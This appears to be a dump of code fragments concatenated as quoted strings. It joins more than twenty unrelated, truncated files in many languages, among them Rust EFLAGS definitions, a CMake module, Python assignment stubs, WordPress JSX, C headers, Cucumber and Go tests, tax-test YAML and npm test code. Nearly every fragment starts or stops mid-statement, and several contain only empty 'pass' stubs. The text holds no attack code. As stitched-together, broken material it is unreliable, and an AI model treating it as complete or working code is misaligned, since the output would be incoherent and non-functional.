: Runic\ntagalog : Tagalog\nhanunoo : Hanun\u00f3o\nbuhid : Buhid\ntagbanwa : Tagbanwa\nkhmer : Khmer\nmongolian : Mongol\nunified-canadian-aboriginal-syllabics-extended : Egyszer\u0171s\u00edtett kanadai bennsz\u00fcl\u00f6tt jelek kieg\u00e9sz\u00edt\u00e9se\nlimbu : Limbu\ntai-le : Tai Le\nnew-tai-lue : \u00daj Tai L\u00fc\nkhmer-symbols : Khmer szimb\u00f3lumok\nbuginese : Bugin\u00e9z\ntai-tham :" +"//! Processor state stored in the EFLAGS register.\n\nuse bitflags::*;\n\nuse crate::Ring;\n\nbitflags! {\n /// The EFLAGS register.\n pub struct EFlags: u32 {\n /// ID Flag (ID)\n const FLAGS_ID = 1 << 21;\n /// Virtual Interrupt Pending (VIP)\n const FLAGS_VIP = 1 << 20;\n /// Virtual Interrupt Flag (VIF)\n const FLAGS_VIF = 1 << 19;\n /// Alignment Check (AC)\n const FLAGS_AC = 1 << 18;\n /// Virtual-8086 Mode (VM)\n const FLAGS_VM = 1 << 17;\n /// Resume Flag (RF)\n const FLAGS_RF = 1 << 16;\n /// Nested Task (NT)\n const FLAGS_NT = 1 << 14;\n /// I/O Privilege Level (IOPL) 0\n const FLAGS_IOPL0 = 0b00 << 12;\n /// I/O Privilege Level (IOPL) 1\n const FLAGS_IOPL1 = 0b01 << 12;\n /// I/O Privilege Level (IOPL) 2\n const FLAGS_IOPL2 = 0b10 << 12;\n /// I/O Privilege Level (IOPL) 3\n const FLAGS_IOPL3 = 0b11 << 12;\n /// Overflow Flag (OF)\n const FLAGS_OF = 1 << 11;\n /// Direction Flag (DF)\n const FLAGS_DF = 1 << 10;\n /// Interrupt Enable Flag (IF)\n const FLAGS_IF = 1 << 9;\n /// Trap Flag (TF)\n const FLAGS_TF = 1 << 8;\n /// Sign Flag (SF)\n const FLAGS_SF = 1 << 7;\n /// Zero Flag (ZF)\n const FLAGS_ZF" +"\ufeffusing DotNet;\r\n\r\nusing Nemerle.Collections;\r\n\r\nusing Nitra.AstUtils;\r\nusing Nitra.Declarations;\r\nusing Nitra.Utils;\r\n\r\nusing System.Drawing;\r\n\r\nusing R = Nitra.Ast.RegexExpressions;\r\n\r\nnamespace Nitra.Ast.RegexExpressions\r\n{\r\n abstract ast Expression : BindableAst\r\n {\r\n }\r\n\r\n abstract ast Unary : R.Expression\r\n {\r\n Expression.Scope = Scope;\r\n Expression : R.Expression;\r\n }\r\n\r\n abstract ast Binary : R.Expression\r\n {\r\n Expression1.Scope = Scope;\r\n Expression2.Scope = Scope;\r\n\r\n Expression1 : R.Expression;\r\n Expression2 : R.Expression;\r\n }\r\n\r\n abstract ast List : R.Unary\r\n {\r\n Expressions.Scope = Scope;\r\n\r\n Expressions : R.Expression*;\r\n }\r\n\r\n ast Sequence : R.List { }\r\n ast Choice : R.List { }\r\n ast Subtract : R.Binary { }\r\n ast Optional : R.Unary { }\r\n ast Repeat : R.Unary { }\r\n ast RepeatWithSeparator : R.Unary\r\n {\r\n Separator.Scope = Scope;\r\n Separator : R.Expression;\r\n }\r\n\r\n ast Call : R.Expression\r\n {\r\n RuleReference.Scope = Scope;\r\n\r\n RuleReference : QualifiedReference;\r\n }\r\n\r\n ast Char : R.Expression { Literal : CharLiteral; }\r\n ast String : R.Expression { Literal : StringLiteral; }\r\n ast Range : R.Expression { }\r\n ast InvertedRange : R.Expression { }\r\n}" +"# - Try to find fts headers and libraries for alpine linux 3.3\n#\n# Usage of this module as follows:\n#\n# find_package(Fts)\n#\n# Variables used by this module, they can change the default behaviour and need\n# to be set before calling find_package:\n#\n# fts_ROOT_DIR Set this variable to the root installation of\n# fts if the module has problems finding the\n# proper installation path.\n#\n# Variables defined by this module:\n#\n# FTS_FOUND System has fts libraries and headers\n# fts_LIBRARY The fts library\n# fts_INCLUDE_DIR The location of fts headers\n\n\n\nfind_path(fts_ROOT_DIR\n NAMES include/fts.h\n)\n\nfind_library(fts_LIBRARY\n NAMES libfts.a fts\n HINTS ${fts_ROOT_DIR}/lib\n)\n\nfind_path(fts_INCLUDE_DIR\n NAMES fts.h\n HINTS ${fts_ROOT_DIR}/include\n)\n\ninclude(FindPackageHandleStandardArgs)\nfind_package_handle_standard_args(fts DEFAULT_MSG\n fts_LIBRARY\n fts_INCLUDE_DIR\n)\n\nmark_as_advanced(\n fts_ROOT_DIR\n fts_LIBRARY\n fts_INCLUDE_DIR\n)" +"\"\"\"\nCS131 - Computer Vision: Foundations and Applications\nAssignment 4\nAuthor: Donsuk Lee (donlee90@stanford.edu)\nDate created: 09/2017\nLast modified: 10/19/2018\nPython Version: 3.5+\n\"\"\"\n\nimport numpy as np\nfrom skimage import color\n\n\ndef energy_function(image):\n \"\"\"Computes energy of the input image.\n\n For each pixel, we will sum the absolute value of the gradient in each direction.\n Don't forget to convert to grayscale first.\n\n Hint: Use np.gradient here\n\n Args:\n image: numpy array of shape (H, W, 3)\n\n Returns:\n out: numpy array of shape (H, W)\n \"\"\"\n H, W, _ = image.shape\n out = np.zeros((H, W))\n gray_image = color.rgb2gray(image)\n\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out\n\n\ndef compute_cost(image, energy, axis=1):\n \"\"\"Computes optimal cost map (vertical) and paths of the seams.\n\n Starting from the first row, compute the cost of each pixel as the sum of energy along the\n lowest energy path from the top.\n\n We also return the paths, which will contain at each pixel either -1, 0 or 1 depending on\n where to go up if we follow a seam at this pixel.\n\n In the case that energies are equal, choose the left-most path. Note that\n np.argmin returns the index of the first ocurring minimum of the specified" +"---\ndescription: How to to tune the computation of forces and stresses\nauthors: FJ\n---\n\n\nThis page gives hints on how to to tune the computation of forces and stresses with the ABINIT package.\n\n## Introduction\n\nHellman-Feynman forces are computed from an analytical formula, and\ncorresponds exactly to the limit of finite differences of energy for\ninfinitesimally small atomic displacements when the ground-state calculation\nis at convergence. This feature is available for all the cases where the total\nenergy can be computed. A correction for non-converged cases allows to get\naccurate forces with less converged wavefunctions than without it. The\ndecomposition of the forces in their different components can be provided.\n\nStress can also be computed. This feature is available for all the cases where\nthe total energy can be computed (except wavelets). The decomposition of the\nstresses in their different components can be provided. A smearing scheme\napplied to the kinetic energy [[ecutsm]] allows one to get smooth energy\ncurves as a function of lattice parameters and angles. A target stress can be\ngiven by the user ([[strtarget]]), the geometry optimization algorithm will\ntry to find" +"import * as vscode from 'vscode';\nimport { VimState } from '../state/vimState';\nimport { TokenType, Token } from './token';\n\ntype LineRefOperation = TokenType.Plus | TokenType.Minus;\n\n/**\n * Represents a range of lines, as expressed on the command line.\n *\n * http://vimdoc.sourceforge.net/htmldoc/cmdline.html#cmdline-ranges\n */\nexport class LineRange {\n left: Token[];\n separator: Token | undefined;\n right: Token[];\n\n constructor() {\n this.left = [];\n this.right = [];\n }\n\n public addToken(tok: Token): void {\n if (tok.type === TokenType.Comma) {\n this.separator = tok;\n return;\n }\n\n if (!this.separator) {\n if (this.left.length > 0) {\n switch (tok.type) {\n case TokenType.Offset:\n case TokenType.Plus:\n case TokenType.Minus:\n break;\n default:\n throw Error('Trailing characters');\n }\n }\n this.left.push(tok);\n } else {\n if (this.right.length > 0) {\n switch (tok.type) {\n case TokenType.Offset:\n case TokenType.Plus:\n case TokenType.Minus:\n break;\n default:\n throw Error('Trailing characters');\n }\n }\n this.right.push(tok);\n }\n }\n\n get isEmpty(): boolean {\n return this.left.length === 0 && this.right.length === 0 && !this.separator;\n }\n\n public toString(): string {\n return this.left.toString() + (this.separator?.content ?? '') + this.right.toString();\n }\n\n /**\n * Resolves the line range to concrete line numbers\n *\n * @param vimState\n * @returns Inclusive line number range [start, end]. Will always be in order.\n */\n public resolve(vimState: VimState): [number, number] {\n if (this.left.length > 0 && this.left[0].type === TokenType.Percent)" +"# pylint: disable=missing-module-docstring\nimport numpy as np\nimport pandas as pd\n\n\nclass RiskMetrics:\n \"\"\"\n This class contains methods for calculating common risk metrics used in trading and asset management.\n \"\"\"\n\n def __init__(self):\n\n pass\n\n @staticmethod\n def calculate_variance(covariance, weights):\n \"\"\"\n Calculate the variance of a portfolio.\n\n :param covariance: (pd.DataFrame/np.matrix) Covariance matrix of assets\n :param weights: (list) List of asset weights\n :return: (float) Variance of a portfolio\n \"\"\"\n\n\n pass\n\n @staticmethod\n def calculate_value_at_risk(returns, confidence_level=0.05):\n \"\"\"\n Calculate the value at risk (VaR) of a portfolio/asset.\n\n :param returns: (pd.DataFrame/np.array) Historical returns for an asset / portfolio\n :param confidence_level: (float) Confidence level (alpha)\n :return: (float) VaR\n \"\"\"\n\n pass\n\n def calculate_expected_shortfall(self, returns, confidence_level=0.05):\n \"\"\"\n Calculate the expected shortfall (CVaR) of a portfolio/asset.\n\n :param returns: (pd.DataFrame/np.array) Historical returns for an asset / portfolio\n :param confidence_level: (float) Confidence level (alpha)\n :return: (float) Expected shortfall\n \"\"\"\n\n pass\n\n @staticmethod\n def calculate_conditional_drawdown_risk(returns, confidence_level=0.05):\n \"\"\"\n Calculate the conditional drawdown of risk (CDaR) of a portfolio/asset.\n\n :param returns: (pd.DataFrame/np.array) Historical returns for an asset / portfolio\n :param confidence_level: (float) Confidence level (alpha)\n :return: (float) Conditional drawdown risk\n \"\"\"\n\n pass" +"import ENTRY from \"../constant/entry.js\"\n\nimport Loader from \"../loader.js\"\nimport Package from \"../package.js\"\n\nimport { dirname } from \"../safe/path.js\"\nimport errors from \"../errors.js\"\nimport dualResolveFilename from \"../module/internal/dual-resolve-filename.js\"\nimport esmParseLoad from \"../module/esm/parse-load.js\"\nimport makeRequireFunction from \"../module/internal/make-require-function.js\"\nimport shared from \"../shared.js\"\nimport validateString from \"../util/validate-string.js\"\n\nconst {\n TYPE_CJS\n} = ENTRY\n\nconst {\n ERR_INVALID_ARG_VALUE\n} = errors\n\nfunction hook(parent) {\n function requirer(request) {\n validateString(request, \"request\")\n\n if (request === \"\") {\n throw new ERR_INVALID_ARG_VALUE(\"request\", request, \"must be a non-empty string\")\n }\n\n const filename = dualResolveFilename(request, parent)\n const defaultPkg = Loader.state.package.default\n const dirPath = dirname(filename)\n\n if (Package.get(dirPath) === defaultPkg) {\n // Clone the default package to avoid the parsing phase fallback path\n // of module/internal/compile.\n Package.set(dirPath, defaultPkg.clone())\n }\n\n const entry = esmParseLoad(request, parent)\n const exported = entry.module.exports\n\n if (entry.type !== TYPE_CJS) {\n shared.bridged.set(exported, entry)\n }\n\n return exported\n }\n\n function resolver(request, options) {\n return dualResolveFilename(request, parent, false, options)\n }\n\n const req = makeRequireFunction(parent, requirer, resolver)\n\n req.main = Loader.state.module.mainModule\n\n return req\n}\n\nexport default hook" +"#!/usr/bin/env ruby\n# vim: set nosta noet ts=4 sw=4:\n#\n# Script to automatically move partitioned tables and their indexes\n# to a separate area on disk.\n#\n# Mahlon E. Smith \n#\n# Example use case:\n#\n# - You've got a heavy insert table, such as syslog data.\n# - This table has a partitioning trigger (or is manually partitioned)\n# by date, to separate incoming stuff from archival/report stuff.\n# - You have a tablespace on cheap or slower disk (maybe even\n# ZFS compressed, or some such!)\n#\n# The only assumption this script makes is that your tables are dated, and\n# the tablespace they're moving into already exists.\n#\n# A full example, using the syslog idea from above, where each child\n# table is date partitioned by a convention of \"syslog_YEAR-WEEKOFYEAR\":\n#\n# syslog # <--- parent\n# syslog_2012_06 # <--- inherited\n# syslog_2012_07 # <--- inherited\n# syslog_2012_08 # <--- inherited\n# ...\n#\n# You'd run this script like so:\n#\n# ./warehouse_partitions.rb -F syslog_%Y_%U\n#\n# Assuming this was week 12 of the year, tables syslog_2012_06 through\n# syslog_2012_11 would start sequentially migrating into the tablespace\n# called 'warehouse'." +"defmodule Cachex.Actions.Expire do\n @moduledoc false\n # Command module to allow setting entry expiration.\n #\n # This module is a little more involved than it would be as it's used as a\n # binding for other actions (such as removing expirations). As such, we have\n # to handle several edge cases with nil values.\n alias Cachex.Actions\n alias Cachex.Services.Locksmith\n\n # add required imports\n import Cachex.Spec\n\n ##############\n # Public API #\n ##############\n\n @doc \"\"\"\n Sets the expiration time on a given cache entry.\n\n If a negative expiration time is provided, the entry is immediately removed\n from the cache (as it means we have already expired). If a positive expiration\n time is provided, we update the touch time on the entry and update the expiration\n to the one provided.\n\n If the expiration provided is nil, we need to remove the expiration; so we update\n in the exact same way. This is done passively due to the fact that Erlang term order\n determines that `nil > -1 == true`.\n\n This command executes inside a lock aware context to ensure that the key isn't currently\n being used/modified/removed from another process in the application.\n \"\"\"\n def execute(cache() = cache, key, expiration, _options) do\n Locksmith.write(cache, [ key ]," +"-- | Halogen does not support writing an HTML string to the DOM. This component allows us to do this\n-- | at a particular controlled HTML node.\nmodule Conduit.Component.RawHTML where\n\nimport Prelude\n\nimport Conduit.Foreign.Marked (RawHTML, marked)\nimport Data.Foldable (for_)\nimport Data.Maybe (Maybe(..))\nimport Effect (Effect)\nimport Effect.Aff.Class (class MonadAff)\nimport Halogen as H\nimport Halogen.HTML as HH\nimport Halogen.HTML.Properties as HP\nimport Web.HTML (HTMLElement)\n\n-- | For an explanation of how to properly use the PureScript FFI with JavaScript, please see the\n-- | `src/Foreign/Marked.js` file and the `Conduit.Foreign.Marked` module.\nforeign import unsafeSetInnerHTML :: HTMLElement -> RawHTML -> Effect Unit\n\ntype State =\n { elemRef :: H.RefLabel\n , markdown :: String\n }\n\ntype Input =\n { markdown :: String }\n\ndata Action\n = SetInnerHTML\n | Receive Input\n\ncomponent :: forall q o m. MonadAff m => H.Component HH.HTML q Input o m\ncomponent = H.mkComponent\n { initialState: \\{ markdown } -> { elemRef: H.RefLabel \"markdown\", markdown }\n , render\n , eval: H.mkEval $ H.defaultEval\n { handleAction = handleAction\n , receive = Just <<< Receive\n , initialize = Just SetInnerHTML\n }\n }\n where\n handleAction :: Action -> H.HalogenM State Action () o m Unit\n handleAction = case _ of\n SetInnerHTML" +"/**\n * WordPress dependencies\n */\nimport { getPathAndQueryString } from '@wordpress/url';\nimport { useSelect } from '@wordpress/data';\nimport {\n\tTooltip,\n\tDropdownMenu,\n\tMenuGroup,\n\tMenuItemsChoice,\n} from '@wordpress/components';\nimport { Icon, home } from '@wordpress/icons';\nimport { __ } from '@wordpress/i18n';\nimport { __experimentalLinkControl as LinkControl } from '@wordpress/block-editor';\n\nexport default function PageSwitcher( {\n\tshowOnFront,\n\tactivePage,\n\tonActivePageChange,\n} ) {\n\tconst { pages = [], categories = [], posts = [] } = useSelect(\n\t\t( select ) => {\n\t\t\tconst { getEntityRecords } = select( 'core' );\n\t\t\tconst pageGroups = {\n\t\t\t\tpages: getEntityRecords( 'postType', 'page' )?.map(\n\t\t\t\t\t( _page ) => {\n\t\t\t\t\t\tconst path = getPathAndQueryString( _page.link );\n\t\t\t\t\t\treturn {\n\t\t\t\t\t\t\tlabel:\n\t\t\t\t\t\t\t\tpath === '/' ? (\n\t\t\t\t\t\t\t\t\t<>\n\t\t\t\t\t\t\t\t\t\t{ _page.title.rendered }\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t
    \n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t
    \n\t\t\t\t\t\t\t\t\t\t
    \n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t) : (\n\t\t\t\t\t\t\t\t\t_page.title.rendered\n\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\ttype: 'page',\n\t\t\t\t\t\t\tslug: _page.slug,\n\t\t\t\t\t\t\tvalue: path,\n\t\t\t\t\t\t\tcontext: {\n\t\t\t\t\t\t\t\tpostType: 'page',\n\t\t\t\t\t\t\t\tpostId: _page.id,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t};\n\t\t\t\t\t}\n\t\t\t\t),\n\t\t\t\tcategories: getEntityRecords( 'taxonomy', 'category' )?.map(\n\t\t\t\t\t( category ) => {\n\t\t\t\t\t\tconst path = getPathAndQueryString( category.link );\n\t\t\t\t\t\treturn {\n\t\t\t\t\t\t\tlabel: category.name,\n\t\t\t\t\t\t\ttype: 'category',\n\t\t\t\t\t\t\tslug: category.slug,\n\t\t\t\t\t\t\tvalue: path,\n\t\t\t\t\t\t\tcontext: {\n\t\t\t\t\t\t\t\tquery: { categoryIds: [ category.id ] },\n\t\t\t\t\t\t\t\tqueryContext: { page: 1 },\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t};\n\t\t\t\t\t}\n\t\t\t\t),\n\t\t\t\tposts: [],\n\t\t\t};" +"import collections\nimport contextlib\nimport shutil\nimport sys\nimport tempfile\n\nimport numpy\nimport six\n\nimport chainer\n# import classes and functions\nfrom chainer.utils.array import size_of_shape # NOQA\nfrom chainer.utils.array import sum_to # NOQA\nfrom chainer.utils.conv import get_conv_outsize # NOQA\nfrom chainer.utils.conv import get_deconv_outsize # NOQA\nfrom chainer.utils.error import _format_array_props # NOQA\nfrom chainer.utils.experimental import experimental # NOQA\nfrom chainer.utils.meta import enable_final # NOQA\nfrom chainer.utils.meta import final # NOQA\nfrom chainer.utils.nondeterministic import nondeterministic # NOQA\nfrom chainer.utils.sparse import CooMatrix # NOQA\nfrom chainer.utils.sparse import get_order # NOQA\nfrom chainer.utils.sparse import to_coo # NOQA\n\n# The following alias has been moved to chainer/__init__.py in order to break\n# circular imports in Python 2.\n# from chainer.utils.walker_alias import WalkerAlias\n\n\n# TODO(kmaehashi) remove this when `six.moves.collections_abc` is implemented.\n# See: https://github.com/chainer/chainer/issues/5097\ntry:\n collections_abc = collections.abc # type: ignore\nexcept AttributeError: # python <3.3\n collections_abc = collections # type: ignore\n\n\ndef force_array(x, dtype=None):\n # numpy returns a float value (scalar) when a return value of an operator\n # is a 0-dimension array.\n # We need to convert such a value to a 0-dimension array because `Function`\n # object needs to return an `numpy.ndarray`.\n if numpy.isscalar(x):\n if dtype is None:\n return numpy.array(x)\n else:\n return numpy.array(x," +"#ifndef INC_NMEA_PARSE_H\n#define INC_NMEA_PARSE_H\n\n#define _XOPEN_SOURCE /* glibc2 needs this */\n#include \n#include \n#include \n#include \"../nmea/nmea.h\"\n\n#define NMEA_TIME_FORMAT\t\"%H%M%S\"\n#define NMEA_TIME_FORMAT_LEN\t6\n\n#define NMEA_DATE_FORMAT\t\"%d%m%y\"\n#define NMEA_DATE_FORMAT_LEN\t6\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n/**\n * Parse GPS position longitude or latitude\n *\n * s string containing the position. Ex: \"4712.55\", 47 degrees and\n * 12.55 minutes. Will be modified.\n * pos is a pointer to a nmea_position struct where the result should be stored.\n *\n * Returns 0 on success, otherwise -1.\n */\nint nmea_position_parse(char *s, nmea_position *pos);\n\n/**\n * Parse cardinal direction\n *\n * s is a string containing the letter representing the cardinal direction.\n *\n * Returns the cardinal direction (nmea_cardinal_t). On failure,\n * NMEA_CARDINAL_DIR_UNKNOWN is returned.\n */\nnmea_cardinal_t nmea_cardinal_direction_parse(char *s);\n\n/**\n * Parse time from a string\n *\n * s is a string containing the time in format \"HHMMSS\".\n * time is a pointer to a tm struct where the parser time will be stored.\n *\n * Returns 0 on success, otherwise -1.\n */\nint nmea_time_parse(char *s, struct tm *time);\n\n/**\n * Parse date from a string\n *\n * s is a string containing the time in format \"DDMMYY\".\n * time is a" +"// Copyright (c) Microsoft Corporation. All rights reserved.\n// Licensed under the MIT License.\n\n#ifdef __ANDROID__\n#include \n\n#include \"core/common/logging/capture.h\"\n#include \"core/common/logging/isink.h\"\n#include \"core/platform/android/logging/android_log_sink.h\"\n\nnamespace onnxruntime {\nnamespace logging {\n\nvoid AndroidLogSink::SendImpl(const Timestamp& /* timestamp */, const std::string& logger_id, const Capture& message) {\n std::ostringstream msg;\n\n int severity = ANDROID_LOG_INFO;\n switch (message.Severity()) {\n case Severity::kVERBOSE:\n severity = ANDROID_LOG_VERBOSE;\n break;\n case Severity::kINFO:\n severity = ANDROID_LOG_INFO;\n break;\n case Severity::kWARNING:\n severity = ANDROID_LOG_WARN;\n break;\n case Severity::kERROR:\n severity = ANDROID_LOG_ERROR;\n break;\n case Severity::kFATAL:\n severity = ANDROID_LOG_FATAL;\n break;\n }\n\n msg << \" [\" << message.SeverityPrefix() << \":\" << message.Category() << \":\" << logger_id << \", \"\n << message.Location().ToString() << \"] \" << message.Message() << std::endl;\n\n __android_log_print(severity, message.Category(), \"%s\", msg.str().c_str());\n}\n\n} // namespace logging\n} // namespace onnxruntime\n#endif" +"\ufeffusing System;\nusing System.Collections.Concurrent;\n\nnamespace Framework\n{\n public class ServiceLocator\n {\n private ServiceLocator()\n {\n\n }\n\n public static ServiceLocator Instance => new ServiceLocator();\n\n private static ConcurrentDictionary s_types = new ConcurrentDictionary();\n public bool Register(Type serviceType, object instance) =>\n s_types.TryAdd(serviceType, instance);\n\n public bool Register(Type serviceType) =>\n s_types.TryAdd(serviceType, null);\n\n public bool Register(Type serviceType, Func factory) =>\n s_types.TryAdd(serviceType, factory);\n\n public T Resolve()\n where T : class, new()\n {\n object val;\n if (s_types.TryGetValue(typeof(T), out val))\n {\n if (val == null)\n {\n Type t = typeof(T).GetGenericTypeDefinition();\n }\n else if (val is Func)\n {\n return ((Func)val)(); // invoke factory\n }\n else\n {\n return val as T;\n }\n }\n return null;\n }\n\n }\n}" +"@validation\nFeature: parameter validation\n Scenario: identifier is required with failover\n When I execute \"cli53 rrcreate --failover PRIMARY $domain 'a A 127.0.0.1'\"\n Then the exit code was 1\n\n Scenario: identifier is required with weight\n When I execute \"cli53 rrcreate --weight 10 $domain 'a A 127.0.0.1'\"\n Then the exit code was 1\n\n Scenario: identifier is required with region\n When I execute \"cli53 rrcreate --region us-west-1 $domain 'a A 127.0.0.1'\"\n Then the exit code was 1\n\n Scenario: identifier alone is invalid\n When I execute \"cli53 rrcreate -i id $domain 'a A 127.0.0.1'\"\n Then the exit code was 1\n\n Scenario: failover must be PRIMARY/SECONDARY\n When I execute \"cli53 rrcreate -i id --failover JUNK $domain 'a A 127.0.0.1'\"\n Then the exit code was 1\n\n Scenario: failover and weight are mutually exclusive\n When I execute \"cli53 rrcreate -i id --failover PRIMARY --weight 10 $domain 'a A 127.0.0.1'\"\n Then the exit code was 1\n\n Scenario: passing --append and --replace at the same time makes no sense\n When I execute \"cli53 rrcreate --append --replace $domain 'a A 127.0.0.2'\"\n Then the exit code was 1\n\n Scenario: create requires one argument\n When I execute \"cli53 create a b\"\n Then the exit code was 1\n\n Scenario: delete requires one argument\n When" +"package service\n\nimport (\n\t\"fmt\"\n\t\"testing\"\n\n\t\"go-common/app/service/main/vip/model\"\n\n\t. \"github.com/smartystreets/goconvey/convey\"\n)\n\nfunc TestServiceaddOpenBind(t *testing.T) {\n\tConvey(\" TestServiceaddOpenBind \", t, func() {\n\t\terr := s.addOpenBind(c, 1, \"xxxx\", 2, &model.OpenBindInfo{}, &model.OpenBindInfo{})\n\t\tSo(err, ShouldBeNil)\n\t})\n}\n\nfunc TestServiceOpenBindByOutOpenID(t *testing.T) {\n\tConvey(\" TestServiceOpenBindByOutOpenID \", t, func() {\n\t\terr := s.OpenBindByOutOpenID(c, &model.ArgBind{\n\t\t\tAppID: 32,\n\t\t\tOpenID: \"bdca8b71e7a6726885d40a395bf9ccd1\",\n\t\t\tOutOpenID: \"7a6726885d40a395bf9ccd2\",\n\t\t})\n\t\tSo(err, ShouldBeNil)\n\t})\n}\n\nfunc TestServiceOpenBindByMid(t *testing.T) {\n\tConvey(\" TestServiceOpenBindByMid \", t, func() {\n\t\terr := s.OpenBindByMid(c, &model.ArgOpenBindByMid{\n\t\t\tAppID: 32,\n\t\t\tOutOpenID: \"7a6726885d40a395bf9ccd3\",\n\t\t\tMid: 1,\n\t\t})\n\t\tSo(err, ShouldBeNil)\n\t})\n}\n\nfunc TestServiceBindInfoByMid(t *testing.T) {\n\tConvey(\" TestServiceBindInfoByMid \", t, func() {\n\t\tres, err := s.BindInfoByMid(c, &model.ArgBindInfo{\n\t\t\tAppID: 30,\n\t\t\tMid: 1,\n\t\t})\n\t\tSo(err, ShouldBeNil)\n\t\tfmt.Println(\"res\", res.Account, res.Outer)\n\t\tSo(res, ShouldNotBeNil)\n\t})\n}" +"- name: IRPP - D\u00e9ficits des revenus de capitaux mobiliers - C\u00e9libataire pour un revenu salarial de 20 000 \u20ac\n keywords: rcm\n period: 2009\n absolute_error_margin: 0.5\n input:\n salaire_imposable: 20000\n f2dc: 5000\n f2aa: 1000\n f2al: 1000\n f2am: 1000\n f2an: 1000\n f2aq: 1000\n f2ar: 1000\n output:\n irpp: -1086\n- name: IRPP - D\u00e9ficits des revenus de capitaux mobiliers - C\u00e9libataire pour un revenu salarial de 20 000 \u20ac\n keywords: rcm\n period: 2010\n absolute_error_margin: 0.5\n input:\n salaire_imposable: 20000\n f2dc: 5000\n f2aa: 1000\n f2al: 1000\n f2am: 1000\n f2an: 1000\n f2aq: 1000\n f2ar: 1000\n output:\n irpp: -1181\n- name: IRPP - D\u00e9ficits des revenus de capitaux mobiliers - C\u00e9libataire pour un revenu salarial de 20 000 \u20ac\n keywords: rcm\n period: 2011\n absolute_error_margin: 0.5\n input:\n salaire_imposable: 20000\n f2dc: 5000\n f2aa: 1000\n f2al: 1000\n f2am: 1000\n f2an: 1000\n f2aq: 1000\n f2ar: 1000\n output:\n irpp: -1181\n- name: IRPP - D\u00e9ficits des revenus de capitaux mobiliers - C\u00e9libataire pour un revenu salarial de 20 000 \u20ac\n keywords: rcm\n period: 2012\n absolute_error_margin: 0.5\n input:\n salaire_imposable: 20000\n f2dc: 5000\n f2aa: 1000\n f2al: 1000\n f2am: 1000\n f2an: 1000\n f2aq: 1000\n f2ar: 1000\n output:\n irpp: -1181\n- name: IRPP - D\u00e9ficits des revenus de capitaux mobiliers - C\u00e9libataire pour un revenu salarial" +"using System;\nusing sd = System.Drawing;\nusing swf = System.Windows.Forms;\nusing Eto.Drawing;\nusing Eto.Forms;\nusing Eto.WinForms.Drawing;\nusing System.Collections.Generic;\nusing System.Linq;\nusing Eto.WinForms.Forms.Menu;\nusing System.Reflection;\nusing System.Diagnostics;\n\nnamespace Eto.WinForms.Forms\n{\n\tpublic interface IWindowsControl: Control.IHandler\n\t{\n\t\tbool InternalVisible { get; }\n\n\t\tswf.DockStyle DockStyle { get; }\n\n\t\tswf.Control ContainerControl { get; }\n\n\t\tSize ParentMinimumSize { get; set; }\n\n\t\tSize GetPreferredSize(Size availableSize, bool useCache = false);\n\n\t\tbool SetMinimumSize(bool updateParent = false, bool useCache = false);\n\n\t\tvoid SetScale(bool xscale, bool yscale);\n\n\t\tbool ShouldCaptureMouse { get; }\n\n\t\tbool XScale { get; }\n\n\t\tbool YScale { get; }\n\n\t\tbool BackgroundColorSet { get; }\n\n\t\tControl.ICallback Callback { get; }\n\n\t\tvoid BeforeAddControl(bool top = true);\n\n\t\tbool ShouldBubbleEvent(swf.Message msg);\n\n\t\tbool UseShellDropManager { get; set; }\n\t}\n\n\tpublic static class WindowsControlExtensions\n\t{\n\t\tpublic static IWindowsControl GetWindowsHandler(this Control control)\n\t\t{\n\t\t\tif (control == null)\n\t\t\t\treturn null;\n\n\t\t\tvar handler = control.Handler as IWindowsControl;\n\t\t\tif (handler != null)\n\t\t\t\treturn handler;\n\n\t\t\tvar controlObject = control.ControlObject as Control;\n\t\t\treturn controlObject != null ? controlObject.GetWindowsHandler() : null;\n\n\t\t}\n\n\t\tpublic static Size GetPreferredSize(this Control control, Size? availableSize = null)\n\t\t{\n\t\t\tvar handler = control.GetWindowsHandler();\n\t\t\treturn handler != null ? handler.GetPreferredSize(availableSize ?? Size.Empty) : Size.Empty;\n\t\t}\n\n\t\tpublic static swf.Control GetContainerControl(this Control control)\n\t\t{\n\t\t\tif (control == null)\n\t\t\t\treturn null;" +"module Lowkiq\n class Server\n def self.build(options)\n require options[:require]\n Lowkiq.on_server_init.call\n\n splitter = Lowkiq.build_splitter.call\n shard_handlers_by_thread = splitter.call Lowkiq.shard_handlers\n scheduler = Lowkiq.build_scheduler.call\n new shard_handlers_by_thread, scheduler\n end\n\n def initialize(shard_handlers_by_thread, scheduler)\n @shard_handlers_by_thread = shard_handlers_by_thread\n @scheduler = scheduler\n @threads = []\n end\n\n def start\n Lowkiq.server_redis_pool.with do |redis|\n Script.load! redis\n end\n\n @shard_handlers_by_thread.each do |handlers|\n handlers.each(&:restore)\n end\n\n @threads = @shard_handlers_by_thread.map do |handlers|\n job = @scheduler.build_job handlers\n Thread.new do\n job.call until exit_from_thread?\n end\n end\n end\n\n def stop\n @stopped = true\n end\n\n def join\n @threads.each(&:join)\n end\n\n def exit_from_thread?\n stopped? || failed?\n end\n\n def stopped?\n @stopped\n end\n\n def failed?\n @threads.map(&:status).any? do |status|\n status != \"run\" && status != \"sleep\"\n end\n end\n end\nend" +"const Edge = require('../lib/edge.js')\nconst t = require('tap')\n\n// slight hack to snapshot the getters\n// would be nice if tcompare.format showed these by default,\n// but it's tricky to know when to show non-iterables and\n// when not to. Really, it'd be best if class getters were\n// iterable by default, or had some syntax to allow it, but\n// that's outside my sphere of direct influence, and using\n// Object.defineProperty(this, 'foo', { get ... }) is a pita.\nt.formatSnapshot = obj =>\n obj instanceof Edge ? {\n ...obj,\n spec: obj.spec,\n name: obj.name,\n type: obj.type,\n valid: obj.valid,\n error: obj.error,\n from: obj.from,\n to: obj.to,\n peer: obj.peer,\n dev: obj.dev,\n optional: obj.optional,\n workspace: obj.workspace,\n missing: obj.missing,\n peerLocal: obj.peerLocal,\n invalid: obj.invalid,\n __proto__: { constructor: Edge },\n } : obj\n\nconst reset = node => {\n node.edgesOut = new Map()\n node.edgesIn = new Set()\n}\n\n// mock nodes\nconst top = {\n edgesOut: new Map(),\n edgesIn: new Set(),\n package: { name: 